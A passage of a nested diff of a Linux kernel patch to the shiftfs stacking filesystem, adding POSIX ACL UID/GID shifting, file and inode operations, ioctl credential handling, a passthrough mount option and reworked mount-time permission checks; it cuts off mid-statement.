inode->i_ino = get_next_ino(); -- inode->i_mode = mode; -- inode->i_flags |= S_NOATIME | S_NOCMTIME; -+static void -+shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to, -+ void *value, size_t size) -+{ -+ struct posix_acl_xattr_header *header = value; -+ struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end; -+ int count; -+ kuid_t kuid; -+ kgid_t kgid; - -- inode->i_op = &shiftfs_inode_ops; -+ if (!value) -+ return; -+ if (size < sizeof(struct posix_acl_xattr_header)) -+ return; -+ if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION)) -+ return; - -- shiftfs_fill_inode(inode, dentry); -+ count = posix_acl_xattr_count(size); -+ if (count < 0) -+ return; -+ if (count == 0) -+ return; - -- return inode; -+ for (end = entry + count; entry != end; entry++) { -+ switch(le16_to_cpu(entry->e_tag)) { -+ case ACL_USER: -+ kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id)); -+ kuid = shift_kuid(from, to, kuid); -+ entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid)); -+ break; -+ case ACL_GROUP: -+ kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id)); -+ kgid = shift_kgid(from, to, kgid); -+ entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid)); -+ break; -+ default: -+ break; -+ } -+ } - } - --static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry) -+static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type) - { -- struct super_block *sb = dentry->d_sb; -- struct shiftfs_super_info *ssi = sb->s_fs_info; -+ struct inode *loweri = inode->i_private; -+ const struct cred *oldcred; -+ struct posix_acl *lower_acl, *acl = NULL; -+ struct user_namespace *from_ns = loweri->i_sb->s_user_ns; -+ struct user_namespace *to_ns = inode->i_sb->s_user_ns; -+ int size; -+ int err; - -- if (ssi->mark) -- seq_show_option(m, "mark", NULL); -+ if (!IS_POSIXACL(loweri)) -+ return NULL; - -- return 0; --} -+ oldcred = shiftfs_override_creds(inode->i_sb); -+ lower_acl = get_acl(loweri, type); -+ revert_creds(oldcred); - --static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf) --{ -- struct super_block *sb = dentry->d_sb; -- struct shiftfs_super_info *ssi = sb->s_fs_info; -- struct dentry *root = sb->s_root; -- struct dentry *realroot = root->d_fsdata; -- struct path realpath = { .mnt = ssi->mnt, .dentry = realroot }; -- int err; -+ if (lower_acl && !IS_ERR(lower_acl)) { -+ /* XXX: export posix_acl_clone? */ -+ size = sizeof(struct posix_acl) + -+ lower_acl->a_count * sizeof(struct posix_acl_entry); -+ acl = kmemdup(lower_acl, size, GFP_KERNEL); -+ posix_acl_release(lower_acl); - -- err = vfs_statfs(&realpath, buf); -- if (err) -- return err; -+ if (!acl) -+ return ERR_PTR(-ENOMEM); - -- buf->f_type = sb->s_magic; -+ refcount_set(&acl->a_refcount, 1); - -- return 0; -+ err = shift_acl_ids(from_ns, to_ns, acl); -+ if (err) { -+ kfree(acl); -+ return ERR_PTR(err); -+ } -+ } -+ -+ return acl; - } - --static void shiftfs_put_super(struct super_block *sb) -+static int -+shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler, -+ struct dentry *dentry, struct inode *inode, -+ const char *name, void *buffer, size_t size) - { -- struct shiftfs_super_info *ssi = sb->s_fs_info; -+ struct inode *loweri = inode->i_private; -+ int ret; -+ -+ ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name, -+ buffer, size); -+ if (ret < 0) -+ return ret; - -- mntput(ssi->mnt); -- put_user_ns(ssi->userns); -- kfree(ssi); -+ inode_lock(loweri); -+ shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns, -+ buffer, size); -+ inode_unlock(loweri); -+ return ret; - } - --static const struct xattr_handler shiftfs_xattr_handler = { -- .prefix = "", -- .get = shiftfs_xattr_get, -- .set = shiftfs_xattr_set, --}; -+static int -+shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler, -+ struct dentry *dentry, struct inode *inode, -+ const char *name, const void *value, -+ size_t size, int flags) -+{ -+ struct inode *loweri = inode->i_private; -+ int err; - --const struct xattr_handler *shiftfs_xattr_handlers[] = { -- &shiftfs_xattr_handler, -- NULL --}; -+ if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl) -+ return -EOPNOTSUPP; -+ if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode)) -+ return value ? -EACCES : 0; -+ if (!inode_owner_or_capable(inode)) -+ return -EPERM; -+ -+ if (value) { -+ shift_acl_xattr_ids(inode->i_sb->s_user_ns, -+ loweri->i_sb->s_user_ns, -+ (void *)value, size); -+ err = shiftfs_setxattr(dentry, inode, handler->name, value, -+ size, flags); -+ } else { -+ err = shiftfs_removexattr(dentry, handler->name); -+ } - --static const struct super_operations shiftfs_super_ops = { -- .put_super = shiftfs_put_super, -- .show_options = shiftfs_show_options, -- .statfs = shiftfs_statfs, -+ if (!err) -+ shiftfs_copyattr(loweri, inode); -+ -+ return err; -+} -+ -+static const struct xattr_handler -+shiftfs_posix_acl_access_xattr_handler = { -+ .name = XATTR_NAME_POSIX_ACL_ACCESS, -+ .flags = ACL_TYPE_ACCESS, -+ .get = shiftfs_posix_acl_xattr_get, -+ .set = shiftfs_posix_acl_xattr_set, - }; - --struct shiftfs_data { -- void *data; -- const char *path; -+static const struct xattr_handler -+shiftfs_posix_acl_default_xattr_handler = { -+ .name = XATTR_NAME_POSIX_ACL_DEFAULT, -+ .flags = ACL_TYPE_DEFAULT, -+ .get = shiftfs_posix_acl_xattr_get, -+ .set = shiftfs_posix_acl_xattr_set, - }; - --static int shiftfs_fill_super(struct super_block *sb, void *raw_data, -- int silent) --{ -- struct shiftfs_data *data = raw_data; -- char *name = kstrdup(data->path, GFP_KERNEL); -- int err = -ENOMEM; -- struct shiftfs_super_info *ssi = NULL; -- struct path path; -- struct dentry *dentry; -+#else /* !CONFIG_SHIFT_FS_POSIX_ACL */ - -- if (!name) -- goto out; -+#define shiftfs_get_acl NULL - -- ssi = kzalloc(sizeof(*ssi), GFP_KERNEL); -- if (!ssi) -- goto out; -+#endif /* CONFIG_SHIFT_FS_POSIX_ACL */ - -- err = -EPERM; -- err = shiftfs_parse_options(ssi, data->data); -+static const struct inode_operations shiftfs_dir_inode_operations = { -+ .lookup = shiftfs_lookup, -+ .mkdir = shiftfs_mkdir, -+ .symlink = shiftfs_symlink, -+ .unlink = shiftfs_unlink, -+ .rmdir = shiftfs_rmdir, -+ .rename = shiftfs_rename, -+ .link = shiftfs_link, -+ .setattr = shiftfs_setattr, -+ .create = shiftfs_create, -+ .mknod = shiftfs_mknod, -+ .permission = shiftfs_permission, -+ .getattr = shiftfs_getattr, -+ .listxattr = shiftfs_listxattr, -+ .get_acl = shiftfs_get_acl, -+}; -+ -+static const struct inode_operations shiftfs_file_inode_operations = { -+ .fiemap = shiftfs_fiemap, -+ .getattr = shiftfs_getattr, -+ .get_acl = shiftfs_get_acl, -+ .listxattr = shiftfs_listxattr, -+ .permission = shiftfs_permission, -+ .setattr = shiftfs_setattr, -+ .tmpfile = shiftfs_tmpfile, -+}; -+ -+static const struct inode_operations shiftfs_special_inode_operations = { -+ .getattr = shiftfs_getattr, -+ .get_acl = shiftfs_get_acl, -+ .listxattr = shiftfs_listxattr, -+ .permission = shiftfs_permission, -+ .setattr = shiftfs_setattr, -+}; -+ -+static const struct inode_operations shiftfs_symlink_inode_operations = { -+ .getattr = shiftfs_getattr, -+ .get_link = shiftfs_get_link, -+ .listxattr = shiftfs_listxattr, -+ .setattr = shiftfs_setattr, -+}; -+ -+static struct file *shiftfs_open_realfile(const struct file *file, -+ struct path *realpath) -+{ -+ struct file *lowerf; -+ const struct cred *oldcred; -+ struct inode *inode = file_inode(file); -+ struct inode *loweri = realpath->dentry->d_inode; -+ struct shiftfs_super_info *info = inode->i_sb->s_fs_info; -+ -+ oldcred = shiftfs_override_creds(inode->i_sb); -+ /* XXX: open_with_fake_path() not gauranteed to stay around, if -+ * removed use dentry_open() */ -+ lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred); -+ revert_creds(oldcred); -+ -+ return lowerf; -+} -+ -+#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT) -+ -+static int shiftfs_change_flags(struct file *file, unsigned int flags) -+{ -+ struct inode *inode = file_inode(file); -+ int err; -+ -+ /* if some flag changed that cannot be changed then something's amiss */ -+ if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK)) -+ return -EIO; -+ -+ flags &= SHIFTFS_SETFL_MASK; -+ -+ if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode)) -+ return -EPERM; -+ -+ if (flags & O_DIRECT) { -+ if (!file->f_mapping->a_ops || -+ !file->f_mapping->a_ops->direct_IO) -+ return -EINVAL; -+ } -+ -+ if (file->f_op->check_flags) { -+ err = file->f_op->check_flags(flags); -+ if (err) -+ return err; -+ } -+ -+ spin_lock(&file->f_lock); -+ file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags; -+ spin_unlock(&file->f_lock); -+ -+ return 0; -+} -+ -+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) -+{ -+ struct shiftfs_file_info *file_info = file->private_data; -+ struct file *realfile = file_info->realfile; -+ -+ lowerfd->flags = 0; -+ lowerfd->file = realfile; -+ -+ /* Did the flags change since open? */ -+ if (unlikely(file->f_flags & ~lowerfd->file->f_flags)) -+ return shiftfs_change_flags(lowerfd->file, file->f_flags); -+ -+ return 0; -+} -+ -+static int shiftfs_open(struct inode *inode, struct file *file) -+{ -+ struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info; -+ struct shiftfs_file_info *file_info; -+ struct file *realfile; -+ struct path *realpath; -+ -+ file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL); -+ if (!file_info) -+ return -ENOMEM; -+ -+ realpath = &file_info->realpath; -+ realpath->mnt = ssi->mnt; -+ realpath->dentry = file->f_path.dentry->d_fsdata; -+ -+ realfile = shiftfs_open_realfile(file, realpath); -+ if (IS_ERR(realfile)) { -+ kmem_cache_free(shiftfs_file_info_cache, file_info); -+ return PTR_ERR(realfile); -+ } -+ -+ file->private_data = file_info; -+ file_info->realfile = realfile; -+ return 0; -+} -+ -+static int shiftfs_release(struct inode *inode, struct file *file) -+{ -+ struct shiftfs_file_info *file_info = file->private_data; -+ -+ if (file_info) { -+ if (file_info->realfile) -+ fput(file_info->realfile); -+ -+ kmem_cache_free(shiftfs_file_info_cache, file_info); -+ } -+ -+ return 0; -+} -+ -+static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence) -+{ -+ struct inode *realinode = file_inode(file)->i_private; -+ -+ return generic_file_llseek_size(file, offset, whence, -+ realinode->i_sb->s_maxbytes, -+ i_size_read(realinode)); -+} -+ -+/* XXX: Need to figure out what to to about atime updates, maybe other -+ * timestamps too ... ref. ovl_file_accessed() */ -+ -+static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb) -+{ -+ int ifl = iocb->ki_flags; -+ rwf_t flags = 0; -+ -+ if (ifl & IOCB_NOWAIT) -+ flags |= RWF_NOWAIT; -+ if (ifl & IOCB_HIPRI) -+ flags |= RWF_HIPRI; -+ if (ifl & IOCB_DSYNC) -+ flags |= RWF_DSYNC; -+ if (ifl & IOCB_SYNC) -+ flags |= RWF_SYNC; -+ -+ return flags; -+} -+ -+static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter) -+{ -+ struct file *file = iocb->ki_filp; -+ struct fd lowerfd; -+ const struct cred *oldcred; -+ ssize_t ret; -+ -+ if (!iov_iter_count(iter)) -+ return 0; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ return ret; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos, -+ shiftfs_iocb_to_rwf(iocb)); -+ revert_creds(oldcred); -+ -+ shiftfs_file_accessed(file); -+ -+ fdput(lowerfd); -+ return ret; -+} -+ -+static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter) -+{ -+ struct file *file = iocb->ki_filp; -+ struct inode *inode = file_inode(file); -+ struct fd lowerfd; -+ const struct cred *oldcred; -+ ssize_t ret; -+ -+ if (!iov_iter_count(iter)) -+ return 0; -+ -+ inode_lock(inode); -+ /* Update mode */ -+ shiftfs_copyattr(inode->i_private, inode); -+ ret = file_remove_privs(file); -+ if (ret) -+ goto out_unlock; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ goto out_unlock; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ file_start_write(lowerfd.file); -+ ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos, -+ shiftfs_iocb_to_rwf(iocb)); -+ file_end_write(lowerfd.file); -+ revert_creds(oldcred); -+ -+ /* Update size */ -+ shiftfs_copyattr(inode->i_private, inode); -+ -+ fdput(lowerfd); -+ -+out_unlock: -+ inode_unlock(inode); -+ return ret; -+} -+ -+static int shiftfs_fsync(struct file *file, loff_t start, loff_t end, -+ int datasync) -+{ -+ struct fd lowerfd; -+ const struct cred *oldcred; -+ int ret; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ return ret; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ ret = vfs_fsync_range(lowerfd.file, start, end, datasync); -+ revert_creds(oldcred); -+ -+ fdput(lowerfd); -+ return ret; -+} -+ -+static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma) -+{ -+ struct shiftfs_file_info *file_info = file->private_data; -+ struct file *realfile = file_info->realfile; -+ const struct cred *oldcred; -+ int ret; -+ -+ if (!realfile->f_op->mmap) -+ return -ENODEV; -+ -+ if (WARN_ON(file != vma->vm_file)) -+ return -EIO; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ vma->vm_file = get_file(realfile); -+ ret = call_mmap(vma->vm_file, vma); -+ revert_creds(oldcred); -+ -+ shiftfs_file_accessed(file); -+ -+ if (ret) -+ fput(realfile); /* Drop refcount from new vm_file value */ -+ else -+ fput(file); /* Drop refcount from previous vm_file value */ -+ -+ return ret; -+} -+ -+static long shiftfs_fallocate(struct file *file, int mode, loff_t offset, -+ loff_t len) -+{ -+ struct inode *inode = file_inode(file); -+ struct inode *loweri = inode->i_private; -+ struct fd lowerfd; -+ const struct cred *oldcred; -+ int ret; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ return ret; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ ret = vfs_fallocate(lowerfd.file, mode, offset, len); -+ revert_creds(oldcred); -+ -+ /* Update size */ -+ shiftfs_copyattr(loweri, inode); -+ -+ fdput(lowerfd); -+ return ret; -+} -+ -+static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len, -+ int advice) -+{ -+ struct fd lowerfd; -+ const struct cred *oldcred; -+ int ret; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ return ret; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ ret = vfs_fadvise(lowerfd.file, offset, len, advice); -+ revert_creds(oldcred); -+ -+ fdput(lowerfd); -+ return ret; -+} -+ -+static int shiftfs_override_ioctl_creds(const struct super_block *sb, -+ const struct cred **oldcred, -+ struct cred **newcred) -+{ -+ kuid_t fsuid = current_fsuid(); -+ kgid_t fsgid = current_fsgid(); -+ -+ *oldcred = shiftfs_override_creds(sb); -+ -+ *newcred = prepare_creds(); -+ if (!*newcred) { -+ revert_creds(*oldcred); -+ return -ENOMEM; -+ } -+ -+ (*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid)); -+ (*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid)); -+ -+ /* clear all caps to prevent bypassing capable() checks */ -+ cap_clear((*newcred)->cap_bset); -+ cap_clear((*newcred)->cap_effective); -+ cap_clear((*newcred)->cap_inheritable); -+ cap_clear((*newcred)->cap_permitted); -+ -+ put_cred(override_creds(*newcred)); -+ return 0; -+} -+ -+static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred, -+ struct cred *newcred) -+{ -+ return shiftfs_revert_object_creds(oldcred, newcred); -+} -+ -+static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, -+ unsigned long arg) -+{ -+ long ret = 0; -+ struct fd lowerfd; -+ struct cred *newcred; -+ const struct cred *oldcred; -+ struct super_block *sb = file->f_path.dentry->d_sb; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ return ret; -+ -+ ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred); -+ if (ret) -+ goto out_fdput; -+ -+ ret = vfs_ioctl(lowerfd.file, cmd, arg); -+ -+ shiftfs_revert_ioctl_creds(oldcred, newcred); -+ -+ shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file)); -+ shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file)); -+ -+out_fdput: -+ fdput(lowerfd); -+ -+ return ret; -+} -+ -+static long shiftfs_ioctl(struct file *file, unsigned int cmd, -+ unsigned long arg) -+{ -+ switch (cmd) { -+ case FS_IOC_GETVERSION: -+ /* fall through */ -+ case FS_IOC_GETFLAGS: -+ /* fall through */ -+ case FS_IOC_SETFLAGS: -+ break; -+ default: -+ return -ENOTTY; -+ } -+ -+ return shiftfs_real_ioctl(file, cmd, arg); -+} -+ -+static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd, -+ unsigned long arg) -+{ -+ switch (cmd) { -+ case FS_IOC32_GETVERSION: -+ /* fall through */ -+ case FS_IOC32_GETFLAGS: -+ /* fall through */ -+ case FS_IOC32_SETFLAGS: -+ break; -+ default: -+ return -ENOIOCTLCMD; -+ } -+ -+ return shiftfs_real_ioctl(file, cmd, arg); -+} -+ -+enum shiftfs_copyop { -+ SHIFTFS_COPY, -+ SHIFTFS_CLONE, -+ SHIFTFS_DEDUPE, -+}; -+ -+static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in, -+ struct file *file_out, loff_t pos_out, u64 len, -+ unsigned int flags, enum shiftfs_copyop op) -+{ -+ ssize_t ret; -+ struct fd real_in, real_out; -+ const struct cred *oldcred; -+ struct inode *inode_out = file_inode(file_out); -+ struct inode *loweri = inode_out->i_private; -+ -+ ret = shiftfs_real_fdget(file_out, &real_out); -+ if (ret) -+ return ret; -+ -+ ret = shiftfs_real_fdget(file_in, &real_in); -+ if (ret) { -+ fdput(real_out); -+ return ret; -+ } -+ -+ oldcred = shiftfs_override_creds(inode_out->i_sb); -+ switch (op) { -+ case SHIFTFS_COPY: -+ ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file, -+ pos_out, len, flags); -+ break; -+ -+ case SHIFTFS_CLONE: -+ ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file, -+ pos_out, len, flags); -+ break; -+ -+ case SHIFTFS_DEDUPE: -+ ret = vfs_dedupe_file_range_one(real_in.file, pos_in, -+ real_out.file, pos_out, len, -+ flags); -+ break; -+ } -+ revert_creds(oldcred); -+ -+ /* Update size */ -+ shiftfs_copyattr(loweri, inode_out); -+ -+ fdput(real_in); -+ fdput(real_out); -+ -+ return ret; -+} -+ -+static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in, -+ struct file *file_out, loff_t pos_out, -+ size_t len, unsigned int flags) -+{ -+ return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags, -+ SHIFTFS_COPY); -+} -+ -+static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in, -+ struct file *file_out, loff_t pos_out, -+ loff_t len, unsigned int remap_flags) -+{ -+ enum shiftfs_copyop op; -+ -+ if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY)) -+ return -EINVAL; -+ -+ if (remap_flags & REMAP_FILE_DEDUP) -+ op = SHIFTFS_DEDUPE; -+ else -+ op = SHIFTFS_CLONE; -+ -+ return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, -+ remap_flags, op); -+} -+ -+static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx) -+{ -+ const struct cred *oldcred; -+ int err = -ENOTDIR; -+ struct shiftfs_file_info *file_info = file->private_data; -+ struct file *realfile = file_info->realfile; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ err = iterate_dir(realfile, ctx); -+ revert_creds(oldcred); -+ -+ return err; -+} -+ -+const struct file_operations shiftfs_file_operations = { -+ .open = shiftfs_open, -+ .release = shiftfs_release, -+ .llseek = shiftfs_llseek, -+ .read_iter = shiftfs_read_iter, -+ .write_iter = shiftfs_write_iter, -+ .fsync = shiftfs_fsync, -+ .mmap = shiftfs_mmap, -+ .fallocate = shiftfs_fallocate, -+ .fadvise = shiftfs_fadvise, -+ .unlocked_ioctl = shiftfs_ioctl, -+ .compat_ioctl = shiftfs_compat_ioctl, -+ .copy_file_range = shiftfs_copy_file_range, -+ .remap_file_range = shiftfs_remap_file_range, -+}; -+ -+const struct file_operations shiftfs_dir_operations = { -+ .compat_ioctl = shiftfs_compat_ioctl, -+ .fsync = shiftfs_fsync, -+ .iterate_shared = shiftfs_iterate_shared, -+ .llseek = shiftfs_llseek, -+ .open = shiftfs_open, -+ .read = generic_read_dir, -+ .release = shiftfs_release, -+ .unlocked_ioctl = shiftfs_ioctl, -+}; -+ -+static const struct address_space_operations shiftfs_aops = { -+ /* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */ -+ .direct_IO = noop_direct_IO, -+}; -+ -+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino, -+ umode_t mode, dev_t dev, struct dentry *dentry) -+{ -+ struct inode *loweri; -+ -+ inode->i_ino = ino; -+ inode->i_flags |= S_NOCMTIME; -+ -+ mode &= S_IFMT; -+ inode->i_mode = mode; -+ switch (mode & S_IFMT) { -+ case S_IFDIR: -+ inode->i_op = &shiftfs_dir_inode_operations; -+ inode->i_fop = &shiftfs_dir_operations; -+ break; -+ case S_IFLNK: -+ inode->i_op = &shiftfs_symlink_inode_operations; -+ break; -+ case S_IFREG: -+ inode->i_op = &shiftfs_file_inode_operations; -+ inode->i_fop = &shiftfs_file_operations; -+ inode->i_mapping->a_ops = &shiftfs_aops; -+ break; -+ default: -+ inode->i_op = &shiftfs_special_inode_operations; -+ init_special_inode(inode, mode, dev); -+ break; -+ } -+ -+ if (!dentry) -+ return; -+ -+ loweri = dentry->d_inode; -+ if (!loweri->i_op->get_link) -+ inode->i_opflags |= IOP_NOFOLLOW; -+ -+ shiftfs_copyattr(loweri, inode); -+ shiftfs_copyflags(loweri, inode); -+ set_nlink(inode, loweri->i_nlink); -+} -+ -+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry) -+{ -+ struct super_block *sb = dentry->d_sb; -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; -+ -+ if (sbinfo->mark) -+ seq_show_option(m, "mark", NULL); -+ -+ if (sbinfo->passthrough) -+ seq_printf(m, ",passthrough=%u", sbinfo->passthrough); -+ -+ return 0; -+} -+ -+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf) -+{ -+ struct super_block *sb = dentry->d_sb; -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; -+ struct dentry *root = sb->s_root; -+ struct dentry *realroot = root->d_fsdata; -+ struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot }; -+ int err; -+ -+ err = vfs_statfs(&realpath, buf); - if (err) -- goto out; -+ return err; - -- /* to mark a mount point, must be real root */ -- if (ssi->mark && !capable(CAP_SYS_ADMIN)) -- goto out; -+ if (!shiftfs_passthrough_statfs(sbinfo)) -+ buf->f_type = sb->s_magic; - -- /* else to mount a mark, must be userns admin */ -- if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN)) -- goto out; -+ return 0; -+} - -- err = kern_path(name, LOOKUP_FOLLOW, &path); -+static void shiftfs_evict_inode(struct inode *inode) -+{ -+ struct inode *loweri = inode->i_private; -+ -+ clear_inode(inode); -+ -+ if (loweri) -+ iput(loweri); -+} -+ -+static void shiftfs_put_super(struct super_block *sb) -+{ -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; -+ -+ if (sbinfo) { -+ mntput(sbinfo->mnt); -+ put_cred(sbinfo->creator_cred); -+ kfree(sbinfo); -+ } -+} -+ -+static const struct xattr_handler shiftfs_xattr_handler = { -+ .prefix = "", -+ .get = shiftfs_xattr_get, -+ .set = shiftfs_xattr_set, -+}; -+ -+const struct xattr_handler *shiftfs_xattr_handlers[] = { -+#ifdef CONFIG_SHIFT_FS_POSIX_ACL -+ &shiftfs_posix_acl_access_xattr_handler, -+ &shiftfs_posix_acl_default_xattr_handler, -+#endif -+ &shiftfs_xattr_handler, -+ NULL -+}; -+ -+static inline bool passthrough_is_subset(int old_flags, int new_flags) -+{ -+ if ((new_flags & old_flags) != new_flags) -+ return false; -+ -+ return true; -+} -+ -+static int shiftfs_remount(struct super_block *sb, int *flags, char *data) -+{ -+ int err; -+ struct shiftfs_super_info new = {}; -+ struct shiftfs_super_info *info = sb->s_fs_info; -+ -+ err = shiftfs_parse_mount_options(&new, data); - if (err) -- goto out; -+ return err; -+ -+ /* Mark mount option cannot be changed. */ -+ if (info->mark || (info->mark != new.mark)) -+ return -EPERM; -+ -+ if (info->passthrough != new.passthrough) { -+ /* Don't allow exceeding passthrough options of mark mount. */ -+ if (!passthrough_is_subset(info->info_mark->passthrough, -+ info->passthrough)) -+ return -EPERM; -+ -+ info->passthrough = new.passthrough; -+ } -+ -+ return 0; -+} - -- err = -EPERM; -+static const struct super_operations shiftfs_super_ops = { -+ .put_super = shiftfs_put_super, -+ .show_options = shiftfs_show_options, -+ .statfs = shiftfs_statfs, -+ .remount_fs = shiftfs_remount, -+ .evict_inode = shiftfs_evict_inode, -+}; -+ -+struct shiftfs_data { -+ void *data; -+ const char *path; -+}; -+ -+static int shiftfs_fill_super(struct super_block *sb, void *raw_data, -+ int silent) -+{ -+ int err; -+ struct path path = {}; -+ struct shiftfs_super_info *sbinfo_mp; -+ char *name = NULL; -+ struct inode *inode = NULL; -+ struct dentry *dentry = NULL; -+ struct shiftfs_data *data = raw_data; -+ struct shiftfs_super_info *sbinfo = NULL; -+ -+ if (!data->path) -+ return -EINVAL; -+ -+ sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL); -+ if (!sb->s_fs_info) -+ return -ENOMEM; -+ sbinfo = sb->s_fs_info; -+ -+ err = shiftfs_parse_mount_options(sbinfo, data->data); -+ if (err) -+ return err; -+ -+ /* to mount a mark, must be userns admin */ -+ if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN)) -+ return -EPERM; -+ -+ name = kstrdup(data->path, GFP_KERNEL); -+ if (!name) -+ return -ENOMEM; -+ -+ err = kern_path(name, LOOKUP_FOLLOW, &path); -+ if (err) -+ goto out_free_name; - - if (!S_ISDIR(path.dentry->d_inode->i_mode)) { - err = -ENOTDIR; -- goto out_put; -+ goto out_put_path; - } - -- sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1; -- if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) { -- printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n"); -- err = -EINVAL; -- goto out_put; -- } -+ if (sbinfo->mark) { -+ struct super_block *lower_sb = path.mnt->mnt_sb; -+ -+ /* to mark a mount point, must root wrt lower s_user_ns */ -+ if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) { -+ err = -EPERM; -+ goto out_put_path; -+ } - -- if (ssi->mark) { - /* - * this part is visible unshifted, so make sure no - * executables that could be used to give suid - * privileges - */ - sb->s_iflags = SB_I_NOEXEC; -- ssi->mnt = path.mnt; -- dentry = path.dentry; -- } else { -- struct shiftfs_super_info *mp_ssi; - - /* -- * this leg executes if we're admin capable in -- * the namespace, so be very careful -+ * Handle nesting of shiftfs mounts by referring this mark -+ * mount back to the original mark mount. This is more -+ * efficient and alleviates concerns about stack depth. - */ -+ if (lower_sb->s_magic == SHIFTFS_MAGIC) { -+ sbinfo_mp = lower_sb->s_fs_info; -+ -+ /* Doesn't make sense to mark a mark mount */ -+ if (sbinfo_mp->mark) { -+ err = -EINVAL; -+ goto out_put_path; -+ } -+ -+ if (!passthrough_is_subset(sbinfo_mp->passthrough, -+ sbinfo->passthrough)) { -+ err = -EPERM; -+ goto out_put_path; -+ } -+ -+ sbinfo->mnt = mntget(sbinfo_mp->mnt); -+ dentry = dget(path.dentry->d_fsdata); -+ } else { -+ sbinfo->mnt = mntget(path.mnt); -+ dentry = dget(path.dentry); -+ } -+ -+ sbinfo->creator_cred = prepare_creds(); -+ if (!sbinfo->creator_cred) { -+ err = -ENOMEM; -+ goto out_put_path; -+ } -+ } else { -+ /* -+ * This leg executes if we're admin capable in the namespace, -+ * so be very careful. -+ */ -+ err = -EPERM; - if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC) -- goto out_put; -- mp_ssi = path.dentry->d_sb->s_fs_info; -- if (!mp_ssi->mark) -- goto out_put; -- ssi->mnt = mntget(mp_ssi->mnt); -+ goto out_put_path; -+ -+ sbinfo_mp = path.dentry->d_sb->s_fs_info; -+ if (!sbinfo_mp->mark) -+ goto out_put_path; -+ -+ if (!passthrough_is_subset(sbinfo_mp->passthrough, -+ sbinfo->passthrough)) -+ goto out_put_path; -+ -+ sbinfo->mnt = 